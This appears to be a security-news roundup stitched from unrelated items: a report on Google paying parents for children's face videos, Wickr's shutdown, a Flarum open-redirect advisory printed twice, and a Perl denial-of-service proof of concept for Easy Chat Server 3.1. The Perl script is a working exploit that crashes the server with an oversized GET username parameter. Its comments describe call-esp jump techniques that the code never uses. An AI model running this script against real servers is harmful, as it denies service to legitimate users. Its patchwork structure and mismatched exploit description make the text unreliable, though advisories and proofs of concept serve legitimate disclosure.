This week in creepy headlines: 404 Media’s Joseph Cox discovered that a Google contractor, Telus, has offered parents $50 to upload videos of their children’s faces, apparently for use as machine learning training data. According to a description of the project Telus posted online, the data collected from the videos would include eyelid shape and skin tone. In a statement to 404, Google said that the videos would be used in the company’s experiments in using video clips as age verification and that the videos would not be collected or stored by Telus but rather by Google—which doesn’t quite reduce the creep factor. “As part of our commitment to delivering age-appropriate experiences and to comply with laws and regulations around the world, we’re exploring ways to help our users verify their age,” Google told 404 in a statement. The experiment represents a slightly unnerving example of how companies like Google may not simply harvest data online to hone AI but may, in some cases, even directly pay users—or their parents—for it.

A decade ago, Wickr was on the short list of trusted software for secure communications. The app’s end-to-end encryption, simple interface, and self-destructive messages made it a go-to for hackers, journalists, drug dealers—and, unfortunately, traders in child sexual abuse materials—seeking surveillance-resistant conversations. But after Amazon acquired Wickr in 2021, it announced in early 2023 that it would be shutting down the service at the end of the year, and it appears to have held to that deadline. Luckily for privacy advocates, end-to-end encryption options have grown over the past decade, from iMessage and WhatsApp to Signal.

23andMe Blames Users for Recent Data Breach as It's Hit With Dozens of Lawsuits

### Impact
The Flarum `/logout` route includes a redirect parameter that allows any third party to redirect users from a (trusted) domain of the Flarum installation to redirect to any link. Sample: `example.com/logout?return=https://google.com`. For logged-in users, the logout must be confirmed. Guests are immediately redirected. This could be used by spammers to redirect to a web address using a trusted domain of a running Flarum installation.

Some ecosystem extensions modifying the logout route have already been affected. Sample: https://discuss.flarum.org/d/22229-premium-wordpress-integration/526

### Patches
The vulnerability has been fixed and published as flarum/core v1.8.5. All communities running Flarum should upgrade as soon as possible to v1.8.5 using:

`composer update --prefer-dist --no-dev -a -W`

You can then confirm you run the latest version using:

`composer show flarum/core`

### Workarounds
Some extensions modifying the logout route can remedy this issue if their implementation is safe. In any case we recommend updating to 1.8.5.

### References
For any questions or comments on this vulnerability, please visit https://discuss.flarum.org/

For support questions, create a discussion at https://discuss.flarum.org/t/support.

A reminder that if you ever become aware of a security issue in Flarum, please report it to us privately by emailing [security@flarum.org](mailto:security@flarum.org), and we will address it promptly.

**Impact**

The Flarum /logout route includes a redirect parameter that allows any third party to redirect users from a (trusted) domain of the Flarum installation to redirect to any link. Sample: example.com/logout?return=https://google.com. For logged-in users, the logout must be confirmed. Guests are immediately redirected. This could be used by spammers to redirect to a web address using a trusted domain of a running Flarum installation.

Some ecosystem extensions modifying the logout route have already been affected. Sample: https://discuss.flarum.org/d/22229-premium-wordpress-integration/526

**Patches**

The vulnerability has been fixed and published as flarum/core v1.8.5. All communities running Flarum should upgrade as soon as possible to v1.8.5 using:

composer update --prefer-dist --no-dev -a -W

You can then confirm you run the latest version using:

composer show flarum/core

**Workarounds**

Some extensions modifying the logout route can remedy this issue if their implementation is safe. In any case we recommend updating to 1.8.5.

**References**

For any questions or comments on this vulnerability, please visit https://discuss.flarum.org/

For support questions, create a discussion at https://discuss.flarum.org/t/support.

A reminder that if you ever become aware of a security issue in Flarum, please report it to us privately by emailing security@flarum.org, and we will address it promptly.

**References**

*   GHSA-733r-8xcp-w9mr
*   flarum/flarum-core@ee8b3b4
*   flarum/framework@7d70328

GHSA-733r-8xcp-w9mr: Flarum's logout Route allows open redirects

Easy Chat Server version 3.1 suffers from a denial of service vulnerability.

#!/usr/bin/perl

use Net::FTP;

# Exploit Title: Easy Chat Server 3.1 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 05 january 2024  
# Vendor Homepage:  N/A  
# Download to demo: https://drive.google.com/file/d/1ZbfeaWSEKlpvCG1eUtD0vNnfkNz_8PlE/view  
# Notification vendor: No reported  
# Tested Version:Easy Chat Server 3.1  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://drive.google.com/file/d/1rG6uTXTg3cTg86qmp9rh2ozQfyOV_Av7/view

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server did not properly handle request with large amounts of data via method GET to web server.  
#The following request sends a large amount of data to the web server to process across method GET, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

    my $payload = "\x90" x 16;  
    $payload = "\x41"x568;

my $buffer = "GET /chat.ghp?username=" . $payload . "&password=&room=2 HTTP/1.1\r\n";  
$buffer .= "User-Agent: Internet Explorer/4.0\r\n";  
$buffer .= "Host: $ip:$port\r\n";  
$buffer .= "Referer: http://$ip\r\n";  
$buffer .= "Connection: Keep-Alive\r\n\r\n";

print("[+] Exploiting...\n");  
my $socket = IO::Socket::INET->new(  
    PeerAddr => $ip,  
    PeerPort => $port,  
    Proto    => 'tcp',  
) or die "Could not connect! Error: $!\n";

$socket->send($buffer);  
close($socket);

    print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print "#################################################################\n";  
      print "#           Easy Chat Server 3.1 - Denied of Service            #\n";  
      print "#                                                               #\n";  
      print "#                Coded by Fernando Mengali                      #\n";  
      print "#                                                               #\n";  
      print "#              e-mail: fernando.mengalli\@gmail.com             #\n";  
      print "#                                                               #\n";  
      print "#################################################################\n";  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

Tag

#google